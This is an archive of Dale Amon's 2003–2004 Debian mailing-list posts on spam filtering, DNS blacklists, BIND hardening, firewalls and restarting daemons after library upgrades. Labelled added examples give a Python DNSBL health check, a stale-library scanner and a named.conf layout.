> accept mail from a given host based on an answer from a defunct
> blacklist is probably not a good idea.

At least he's more up to date than I! :-)

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--
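A defunct zone can fail in two ways: it stops answering, or it starts answering for every query. The sketch below is an added example (not from the thread and not Exim code) that checks each zone with the RFC 5782 test addresses 127.0.0.2 and 127.0.0.1 before it is trusted; the `*.dnsbl.example` zones and the fake resolver are constructed so that it runs offline.

```python
"""DNSBL zone health check. Added example; the *.dnsbl.example zones are constructed."""
import ipaddress
import socket

TEST_LISTED = "127.0.0.2"      # RFC 5782: an IPv4 DNSBL must list this test address
TEST_NOT_LISTED = "127.0.0.1"  # RFC 5782: an IPv4 DNSBL must never list this one


def parse_rbl_domains(value):
    """Split a colon-separated 'zone/action' list like the rbl_domains value quoted above."""
    zones = []
    for item in value.split(":"):
        item = item.strip()
        if item:
            zones.append(item.split("/", 1)[0].lower())
    return zones


def dnsbl_query_name(ip, zone):
    """Reverse the IPv4 octets and append the zone: 192.0.2.10 -> 10.2.0.192.<zone>."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")  # raises ValueError on bad input
    return ".".join(reversed(octets)) + "." + zone.strip(".")


def system_resolver(name):
    """Return the A records for name; [] on NXDOMAIN or any other lookup failure."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except OSError:
        return []


def classify_zone(zone, resolve=system_resolver):
    """Return 'ok', 'no-answer' or 'lists-everything' for one DNSBL zone."""
    # Any answer for 127.0.0.1 means the zone would reject mail from every host.
    if resolve(dnsbl_query_name(TEST_NOT_LISTED, zone)):
        return "lists-everything"
    # No answer for 127.0.0.2 means the zone is gone and silently filters nothing.
    if not resolve(dnsbl_query_name(TEST_LISTED, zone)):
        return "no-answer"
    return "ok"


def usable_zones(zones, resolve=system_resolver):
    """Keep only the zones that pass both test-address checks."""
    return [z for z in zones if classify_zone(z, resolve) == "ok"]


def fake_resolver(name):
    """Constructed DNS answers for three hypothetical zones (no network needed)."""
    if name.endswith(".wildcard.dnsbl.example"):
        return ["127.0.0.2"]                      # wildcard: answers for every name
    if name == "2.0.0.127.healthy.dnsbl.example":
        return ["127.0.0.2"]                      # only the mandatory test entry
    return []                                     # everything else: NXDOMAIN


if __name__ == "__main__":
    for z in ("healthy.dnsbl.example", "wildcard.dnsbl.example", "dead.dnsbl.example"):
        print(z, classify_zone(z, fake_resolver))
```

Run against live zones by leaving `resolve` at its default; `system_resolver` cannot tell NXDOMAIN from a timeout, so a "no-answer" result is worth rechecking before a zone is dropped.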



rbl's status?

2004-06-13 Thread Dale Amon
I just noticed that my exim4 config access to 
rbl.mail-abuse.org is no longer valid. I'd heard
Vixie had 'gone pro' but hadn't thought much 
about it.

What are the recommended rbl's these days? 

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Spam fights

2004-06-11 Thread Dale Amon
On Fri, Jun 11, 2004 at 08:39:12PM +1000, Russell Coker wrote:
> It won't work because challenge-response systems are technically no good.  
> While CR systems are almost never used because the people who use them are 
> universally regarded as cretins, the spammers won't bother about trying to 
> fool them.

First of all, keep in mind that I am strictly talking about 
people for whom email is an office tool equivalent to the 
paper mail coming into their physical inbox. They don't
know how the US/B/other/PO gets it there and don't care.

That said, those who can afford it will hire human 
operators to act as email gatekeepers; those who can't
will use whatever a salesman can convince them is
affordable and works. Whether we like it or not will
not figure into the decision.

I already whitelist; unless I have manually pre-cleared
you, I won't see your mail for some time. Basically until
I have time to wade through the sludge, assuming I'm not
back from a trip and just look for one or two expected mails
before deleting. I imagine I'm not alone. CR may not
be the solution, but more and more people are only
taking pre-authorized (whitelist) mail.

If your business requires receiving unsolicited email,
then your business model will include the wages of 
a presorter. They are cheaper than a knowledgeable
mail admin.

As to the "type in this random code from a jpeg",
I use that on samizdata (a major blog for which I'm
one of the editors). It stopped the problem of blog-spam
cold; the human entry is stopped cold by having 
a team of writers who delete on sight.

At the end of the day, dealing with spam is an
employment opportunity, not something that will be
solved technically. Human problems require human 
solutions.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Spam fights

2004-06-11 Thread Dale Amon
On Fri, Jun 11, 2004 at 10:45:44AM +1000, Russell Coker wrote:
> It is anti-social for every idiot on the net to think that they are important 
> enough to require a subscription from everyone who wants to send them email.

Like it or not (and I don't) that is where we are
headed if other solutions to spam are not implemented
that cover non-NANOG type persons. I strongly suspect
we'll see a generation of mail systems which greylist 
by default at the very least. Perhaps a future 
secretarial job will be to wade through the muck and
query the boss as to whether one or two should be
allowed access.

For some people, even the volume of non-spam mail
could be rather intolerable. Imagine if you were
Tom Hanks and your private email got out and you
had to go through thousands of adoring fan mails
to find that movie contract from your agent...

Pre-authorization for email is the way things are
going to go. 

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Problem with Spam Assassin

2004-06-06 Thread Dale Amon
Has anyone else been seeing this problem with spamassassin?

sa-learn --spam --mbox spambox

Argument "\008566332M-XM-yM-@@" isn't numeric in numeric lt (<) at 
/usr/share/perl5/Mail/SpamAssassin/BayesStore.pm line 1267.
  |
  |
  for pages and pages and pages

The lines in question are:

# Make sure to check for either !defined or "" ...  Apparently
# sometimes the DB module doesn't return the value correctly. :(
my $oldmagic = $self->{db_toks}->{$OLDEST_TOKEN_AGE_MAGIC_TOKEN};
--> if (!defined ($oldmagic) || $oldmagic eq "" || $atime < $oldmagic) {
  $self->{db_toks}->{$OLDEST_TOKEN_AGE_MAGIC_TOKEN} = $atime;

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: how debconf manages passwds

2004-06-04 Thread Dale Amon
On Wed, Jun 02, 2004 at 12:19:35AM -0700, Matt Zimmerman wrote:
> On Wed, May 26, 2004 at 07:33:12PM +0200, jorge salamero wrote:
> 
> > yes but ...
> > 
> > /usr/sbin/dpkg-reconfigure: cacti is not fully installed
> 
> man dpkg-reconfigure

Or else just manually edit the debian registry ;-)

/var/cache/debconf/config.dat

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Server slowdown...

2004-04-14 Thread Dale Amon
On Wed, Apr 14, 2004 at 11:20:49PM +0200, Jaroslaw Tabor wrote:
> I'm almost sure that this is software problem. The machine is working
> without hardware changes for years, and it didn't happened before.
> The only changes I did, are software updates (from debian-security)
> and kernel upgrade after last holes were discovered.

It sounds like a slow memory leak to me. I had the
same problem years and years ago... it finally sorted
itself out with another upgrade a year later. They
can be the devil to find.

Are you getting any disk thrashing as it approaches
'death'?

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Slightly OT: Setting the primary NIC

2004-03-21 Thread Dale Amon
On Sun, Mar 21, 2004 at 10:20:06AM +0100, Sven Riedel wrote:
> I'm struggling with a problem on a multi-homed host running debian, and

Well, it's not actually multi-homed. I'll bet both of your
NIC's are contained inside the same ASN and that they aren't even
running BGP ;-)

> Anyway, the Host has an internal NIC and an external NIC (acting among
> other things as a firewall). For some reason, all services think the
> external NIC is the primary, and will try to bind to that/all requests
> from samba/cups etc have a source IP from the external NIC, which
> complicates the setups of the internal hosts.

Many daemons have config statements for binding to
particular ports. You'll have to set them up on a
case by case basis. 

Most of them will bind by default to all ip's defined
for the host.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Checking what running program are using old libraries

2004-03-18 Thread Dale Amon
On Thu, Mar 18, 2004 at 12:03:29PM +0100, Jan Dittberner wrote:
> Such a script exists in testing
> 
> package: debian-goodies
> filename: /usr/bin/checkrestart

Of course you have to do different things for different
PID's. Most daemons you can 'restart'. Some you might
have to 'stop' and then 'start'. getty's you just kill
because init will restart them. You have to logout and
reconnect on all your remote ssh sessions.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Checking what running program are using old libraries

2004-03-18 Thread Dale Amon

While we're on the subject, what is apache doing?
apache26756 root  memDEL0,5   393216 /SYSV
apache26757 www-data  memDEL0,5   393216 /SYSV
apache26758 www-data  memDEL0,5   393216 /SYSV

is it opening tmp files and immediately deleting 
them like mailers do so they vanish if the program dies?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--
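What a checkrestart-style scan looks for, as an added example (not the debian-goodies script): it reads `/proc/PID/maps` and reports executable mappings whose backing file has been deleted, while skipping SysV shared memory segments, which the kernel also lists under a `/SYSV...` name marked `(deleted)`. The sample maps text, the library version in it and the ignore list are constructed for illustration.

```python
"""Find processes that still map deleted library files. Added example."""
import os
from collections import namedtuple

Mapping = namedtuple("Mapping", "perms dev inode path deleted")
DELETED_SUFFIX = " (deleted)"
# Mappings that carry the deleted marker but are not replaced libraries:
# SysV shared memory, shared anonymous memory (/dev/zero) and memfd regions.
IGNORED_PREFIXES = ("/SYSV", "/dev/", "/memfd:")

# Constructed sample of /proc/PID/maps for a daemon started before a libc upgrade.
SAMPLE_MAPS = """
08048000-0804f000 r-xp 00000000 08:01 131090 /usr/sbin/apache
40017000-40145000 r-xp 00000000 08:01 262301 /lib/libc-2.3.2.so (deleted)
40145000-4014d000 rw-p 0012e000 08:01 262301 /lib/libc-2.3.2.so (deleted)
4014d000-40150000 rw-p 00000000 00:00 0
40200000-40260000 rw-s 00000000 00:05 393216 /SYSV00000000 (deleted)
bfffe000-c0000000 rwxp 00000000 00:00 0 [stack]
"""


def parse_maps_line(line):
    """Parse one maps line; return None for blank lines and anonymous mappings."""
    fields = line.split(None, 5)
    if len(fields) < 6:
        return None
    _addr, perms, _offset, dev, inode, path = fields
    path = path.rstrip("\n")
    deleted = path.endswith(DELETED_SUFFIX)
    if deleted:
        path = path[: -len(DELETED_SUFFIX)]
    return Mapping(perms, dev, int(inode), path, deleted)


def stale_libraries(maps_text):
    """Return the sorted paths of deleted files that are still mapped executable."""
    stale = set()
    for line in maps_text.splitlines():
        m = parse_maps_line(line)
        if m is None or not m.deleted:
            continue
        if m.path.startswith(IGNORED_PREFIXES):
            continue
        if "x" in m.perms:  # code segment of a file that was replaced on disk
            stale.add(m.path)
    return sorted(stale)


def scan_proc(proc_root="/proc"):
    """Map pid -> (command name, stale library paths) for every readable process."""
    report = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "maps")) as fh:
                libs = stale_libraries(fh.read())
            with open(os.path.join(proc_root, entry, "comm")) as fh:
                name = fh.read().strip()
        except OSError:
            continue  # process exited meanwhile, or we may not read it
        if libs:
            report[int(entry)] = (name, libs)
    return report


if __name__ == "__main__":
    print("sample:", stale_libraries(SAMPLE_MAPS))
    for pid, (name, libs) in sorted(scan_proc().items()):
        print(pid, name, ", ".join(libs))
```

Run as root to see every process; without it, only the caller's own processes are readable and the rest are skipped.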



Re: apt-get upgrade and kernel images

2004-02-27 Thread Dale Amon
On Fri, Feb 27, 2004 at 10:47:41AM +, Jeremy Sowden wrote:
> > Note that the package name is truncated with "dpkg -l"
> > (cf. dpkg-query...).
> 
> 
> The truncation can be remedied.  I tend to use:
> 
> COLUMNS=150 dpkg -l 'kernel-*' | awk '$1 ~ /ii/ { print $0 }'
> 
> to check what I've got installed.

These will give you just the name lists:

apt-cache pkgnames
dpkg --get-selections

but not the version info. Useful in some 
circumstances.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Fwd: Re: [ox-en] Walther

2004-02-25 Thread Dale Amon
On Wed, Feb 25, 2004 at 06:02:22PM +0200, Martin Hardie wrote:
> so the use of debian products for racist work is ok for debian
> by using debian he associates debians products with racism
> 
> On Wednesday 25 February 2004 17:41, Dale Amon wrote:
> > On Wed, Feb 25, 2004 at 04:37:20PM +0200, Martin Hardie wrote:
> > > or is good code more important than this sort of stuff?
> >
> > Yes, as long as his personal beliefs are kept outside
> > of Debian. I think a severe warning to keep his politics
> > outside of Debian would be sufficient.

Debian is useable by anyone. Let's not go down that
road or you'll have everyone trying to decide who is
allowed to use what software for what purpose and since
practically everyone hates *someone*, the whole endeavour
dies. 

The software is just there for all to use on an 
equal basis. Even an al Qaeda member can use debian... 
although I'd shoot them dead on sight if I met them in 
person. But that would have nothing to do with Debian or
Debian use or Debian policy or Debian anything.

That's why there are very wise rules in Debian and GPL
in general to make software freely available to *all*
persons.

Why don't we drop this thread and leave it to the 
list maintainer?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Fwd: Re: [ox-en] Walther

2004-02-25 Thread Dale Amon
On Wed, Feb 25, 2004 at 04:37:20PM +0200, Martin Hardie wrote:
> or is good code more important than this sort of stuff?

Yes, as long as his personal beliefs are kept outside
of Debian. I think a severe warning to keep his politics
outside of Debian would be sufficient.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: How To Set Up Mail-out-only System ?

2004-02-10 Thread Dale Amon
On Wed, Feb 11, 2004 at 01:41:13AM +, Nick Boyce wrote:
> I've just set up a "secure" (you know .. more than usual) Debian system, 
> and want to arrange things so that it can send mail out when necessary 
> (in case anything happens that it thinks I should know about) but is 
> *not* constantly listening for incoming mail.

You could firewall incoming port 25 connections...

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



cflows and debian

2004-02-08 Thread Dale Amon
Does anyone know where I can find a cflowd package?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Firewall: Need Advice

2004-02-07 Thread Dale Amon
On Sat, Feb 07, 2004 at 10:38:51AM +0200, E&Erdem wrote:
> I've been using iptables (or I am assuming that). But at boot time it gives
> an error: "Aborting iptables load: unknown rulesets "active" ". I
> couldn't find the problem. I searched via Google, and found
> dpkg-reconfigure iptables. But it didn't help. I read a lot of iptables
> documents. But I think I lost some points, because I don't understand
> something.

Since I do my own firewall from scratch and don't
touch the auto-installed stuff, I can only surmise.

There may be a script in /etc/init.d/ that is loading
a debian default firewall if you selected a package
with a default firewall.

I seem to remember running across a script that reads
on startup and writes on stop to a directory in /etc/defaults
or something like that.

I will also add that if you are going down the route
of creating your own from scratch, make sure you read
and re-read the HOWTO's on iptables and firewalling
and that you have a good knowledge of routing.

However if your requirements are very simple, it is 
not hard to do a Masquerade firewall. And if you wish
to go one step past that and close all outgoing ports
and then allow a few specific ones, that also is not
very complex.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Question on security.debian.org

2004-02-01 Thread Dale Amon
Any more news on what is wrong with security.debian.org?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Query NS

2004-02-01 Thread Dale Amon
On Sun, Feb 01, 2004 at 03:46:07PM +0100, Hans Spaans wrote:
> You added it globally and to every zone? Also allow-transfer is a nice
> one to get into place. But you will see queries being denied and if you

Yes, I've got allow-transfer groups on all domains; allow-query { any; }
on all domains I serve, and an options allow-query group and allow-recursion
group in options so that only authorized sites can use the cache.

> check those IP's you'll see that they don't run any nameserver. So
> don't worry too much.

I'd originally thought otherwise, but as I went through
the trace I found the real name servers were trying to
do a lookup for a dead zone, one I used to host but which
the owner has taken off line. Some fairly big ISP's are
using annoying short Retry times...

> I did but wasn't impressed, only when the new cyberangels was making 
> sure we needed to handle an extra 6 a 700 q/s ;-)

I have to be careful though as I get phone calls if
my bandwidth usage goes too high. It got so bad a week
ago (before I put in the blocking) that processes 
were dying on my server due to memory starvation (the kernel
was killing processes as resources were being overused), 
that I had to risk down time to do something about it. 
 
I'd still be interested to know if anyone knows *why*
so many people are doing this. I know what they are doing;
I can block it; but I'm curious. I've got a gut feeling
it has something to do with spammers hiding their tracks,
but I'm not sure how it would or why it would be useful
to them. 

I just can't come up with anything else.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Query NS

2004-02-01 Thread Dale Amon
On Sun, Feb 01, 2004 at 02:29:53PM +0100, Hans Spaans wrote:
> But then again, you can do a joke next month so people have a problem
> or you can fix this problem by adding allow-query statements to your 
> named.conf and forcing people to abuse someone else.

Actually that's precisely how I discovered it. I added
allow queries and was trying to figure out why I was
denying so many queries per second.

Others should take a look and see if this is really
widespread. I'm getting it from a whole *bunch* of
different ip's. 

I wish I could do the joke, but I have too many real
zones that I primary and secondary so I can't really
load a phony root.db.

I agree with your analysis. It seems like a really
stupid thing to do, which is why I am having trouble
understanding why so many people are querying me
like that. It just doesn't make sense.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Query NS

2004-02-01 Thread Dale Amon
What is the purpose of a DNS query NS ? It returns
to the requester my list of root servers, which seems
pointless... and I am getting hit by them at the rate
of several a second from various nameservers.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Hardening named.conf

2004-01-28 Thread Dale Amon
Things don't seem to be working quite as expected. I have
something like this now:

 acl mydomain {
        localhost;
        192.168.0.0/24;
        10.1.1.0/24;
 };

There are many eth0:n and I tried it with each ip
specified individually, then added the localhost
keyword in addition.

 options {
        allow-recursion {
                mydomain;
        };
 };
 
This seems to do much of what I want... but I am 
seeing some things which are a bit dodgy. For instance,
if I run iptstate on the dns server and tell it to resolve
names, I get all the inverse lookups denied.

I now suspect at least some of the 1 or so queries
I've blocked in the last couple hours are valid, but it
is hard to tell amidst the buzzing of the spammers on
the screen door...

I note that another person suggested this is the wrong
technique to use. Would that person say it was better
to do something like:


 options {
   allow-queries {
mydomain;
 };

  zone 
allow-queries {
all;
};

???

I have to be careful with experimentation because this
is not a toy machine. Not exceedingly busy, but still
a real server doing real serving.

A slightly different problem, which I just started 
looking into deeper, is that I have
zone .
allow-transfer {
dnsip1;
dnsip2;
myworkstation;
};

where the object is to allow my workstation to 
do host -a -l ... but it doesn't work. Says I
am not a primary or secondary. This is not quite
what I would expect since anyone can transfer if
there is no allow-transfer statement at all.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Hardening named.conf

2004-01-28 Thread Dale Amon
I've finally been annoyed enough by spammer hits on
my DNS that I've pulled out the BOG for the first time
in several years.

What I'd like to accomplish is the following:

* allow-query for a specific list of addresses
  to use the server for their dns resolution.

* allow-query to the universe for zones
  (domains and subdomains) that are hosted 
  as primary or secondary on the server but 
  drop all other requests.

* I already limit zone xfr's to specific
  machines.

I'm not clear on how to do the first and second without
them interfering with each other although I'm sure
it can be done.

I am leaning towards an options allow-query with a
an access list and adding allow-query to each zone
to allow-query all if I can figure out how to do that.

If some kind soul knows off the top of their head, it
would save me the better part of an evening and perhaps
wee hours of the morning.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--
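
Added example (not part of the original thread, and not the poster's own configuration): one named.conf layout for the goals listed in the message above, following what the 2004-02-01 "Re: Query NS" message on this page describes (a restricted allow-query and allow-recursion in options, allow-query { any; } on each hosted zone). The zone names, file paths, the "xfer" ACL name and the 192.0.2.x addresses are placeholders; the option is spelled allow-query and the built-in match-everything ACL is any.

```conf
// Clients allowed to use this server as their resolver.
// "mydomain" and its networks are the ACL quoted in the thread.
acl mydomain {
        localhost;
        192.168.0.0/24;
        10.1.1.0/24;
};

// Hosts allowed to pull zone transfers. "xfer" is a hypothetical name;
// the addresses are placeholders standing in for the thread's
// dnsip1, dnsip2 and myworkstation.
acl xfer {
        192.0.2.53;
        192.0.2.54;
        192.0.2.10;
};

options {
        directory "/var/cache/bind";        // assumed path

        // Default for every name not covered by a zone-level override:
        // only the listed clients may query or recurse, so outside
        // hosts cannot use the cache.
        allow-query     { mydomain; };
        allow-recursion { mydomain; };

        // No zone transfers unless a zone says otherwise.
        allow-transfer  { none; };
};

// Zone hosted as primary: answer anyone, but only for this zone's data.
zone "example.com" {
        type master;
        file "/etc/bind/db.example.com";    // assumed path
        allow-query    { any; };            // overrides options for this zone
        allow-transfer { xfer; };
};

// Zone hosted as secondary: same per-zone override.
zone "example.net" {
        type slave;
        file "db.example.net";              // assumed path, relative to directory
        masters        { 192.0.2.53; };     // placeholder primary
        allow-query    { any; };
        allow-transfer { xfer; };
};
```

A zone-level allow-query replaces the options-level one for that zone only, so the two goals do not interfere. Outside clients asking for names the server does not host are answered with REFUSED rather than silently dropped, and named-checkconf will parse the file before a reload.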



Re: W32/Mydoom@MM (was: Re: )

2004-01-27 Thread Dale Amon
On Tue, Jan 27, 2004 at 09:50:24AM -0700, s. keeling wrote:
> Pardon me if this seems a bit thick headed, but why should I care?  The
> Windows world is always being attacked by crap like this.  Why is this
> news?
> 
> I don't use Windows.  Since you're using Evolution, I assume you
> aren't either.  So what's the big deal?
> 
> Of course if you're using Debian as a mailserver for an internal
> Windows network, this may affect you, but what's it got to do with
> Debian?

Many use Debian boxes as corporate servers. Some people
here will have to worry about security of their company
LAN which contains Windows boxes picking up their mail
from that Linux server.

So yes, for some people it *does* matter.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Need recomendations for https proxy that serves as a firewall proxy

2003-12-31 Thread Dale Amon
On Wed, Dec 31, 2003 at 03:05:43PM +0100, Richard Atterer wrote:
> On Wed, Dec 31, 2003 at 11:33:02AM +0200, Haim Ashkenazi wrote:
> > I have a client that has an exchange server inside the LAN and he wants to
> > access the web interface from the world. I thought I'll put a transparent
> > proxy server on the DMZ. apt-cache search proxy gave a few options but
> > except squid (which is a little overkill for this) I don't know any of them
> > (especially in terms of security) and I'm looking for recommendations.
> 
> Um, do I understand correctly that you want to allow access from the
> internet to a machine in your client's LAN? In that case, squid is indeed
> the wrong solution.

I think they may be talking about MS Exchange Server.
The program I like to think of as "The Internet's
Answer to the Petri Dish*"

I do not think I would use the words "Exchange Server"
and "Security" in the same breath. 

On the serious side, you probably could allow a port
redirect to that machine if there are no other web
services to be accessed.

In general though, this is a pretty bad idea, and with
MS Inside, even worse.

* for the non biologically inclined, that's what you
  use for culturing bacteria...

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: suspicious smbd connections

2003-12-24 Thread Dale Amon
On Wed, Dec 24, 2003 at 03:33:54PM +0100, outsider wrote:
> But I have a dynamic IP. Every time I boot my system I get another 
> IP-address.

Besides what everyone else said... I've also seen it
happen that someone pulls an address from dhcp that
was perhaps minutes before being used by someone running
a p2p server. Not relevant to your samba, but it can be
so bad you reboot to get off the ip.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Attempts to poison bayesian systems

2003-12-24 Thread Dale Amon
On Wed, Dec 24, 2003 at 04:08:14AM +, Nick Boyce wrote:
> Merry Happy Season Of Jollyness everyone
> Nick Boyce
> Bristol, UK

I'll second that: A Merry Christmas and a bug-free New
Year to all!

Dale Amon
Belfast, UK and/or Ireland ;-^

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: Attempts to poison bayesian systems

2003-12-23 Thread Dale Amon
On Tue, Dec 23, 2003 at 01:32:23PM +, Kalle Kivimaa wrote:
> I have yet to see a false positive caused by this even though I get
> quite a lot of this stuff and routinely mark it as spam.

I can't think of any other reason for someone to do it
though. There has to be a point. Someone is going to a 
lot of trouble.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Attempts to poison bayesian systems

2003-12-23 Thread Dale Amon
I've been noticing loads of mails like this lately:

  Date: Sun, 21 Dec 2003 16:25:34 +0500
  From: "Joseph Jenkins" <[EMAIL PROTECTED]>
  Subject: Re: MIT, rest in peace!
  To: [EMAIL PROTECTED]
  X-Mailer: mPOP Web-Mail 2.19

  emery atrocious larval drippy elate incontrollable raster anglicanism
  checkerberry feed sit ajar saturable decathlon
  already climate inhibition pagoda narcissus expository toni

I can only assume someone out there is trying to attack
bayesian systems by loading them up with all sorts of
normal words so that good mail gets false positives, thus
breaking the systems.

I presume others are seeing this?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


